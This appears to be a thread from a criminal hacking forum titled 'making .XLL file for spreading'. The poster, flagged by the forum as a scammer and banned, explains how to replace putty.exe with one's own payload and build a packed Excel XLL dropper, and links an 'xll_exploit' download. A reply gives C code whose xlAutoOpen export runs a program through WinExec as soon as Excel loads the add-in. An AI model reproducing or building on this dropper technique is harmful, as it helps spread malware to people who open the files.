• XSS.stack #1 – первый литературный журнал от юзеров форума

making .XLL file for spreading

Crack3d

ripper
КИДАЛА
Регистрация
27.03.2023
Сообщения
7
Реакции
4
Пожалуйста, обратите внимание, что пользователь заблокирован
anyone who knows even a little c# will know what to do here. or if your really lazy and dont know what to do, download and install visual studios.
replace the file putty.exe with your own (name it the same thing). open the .sln, do a ctrl+b, then look into the bin/debug folder,
you want the file that looks like *x64*-*packed* (* as in regex term).


Download: https://anonfiles.com/n2z0Wfh6z4/xll_exploit_rar
 
Последнее редактирование:
C:
#include <Windows.h>

__declspec(dllexport) void __cdecl xlAutoOpen(void);

void __cdecl xlAutoOpen() {
    WinExec("calc.exe", 1);
}

BOOL APIENTRY DllMain(HMODULE hModule,DWORD  ul_reason_for_call,LPVOID lpReserved){
    switch (ul_reason_for_call){
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх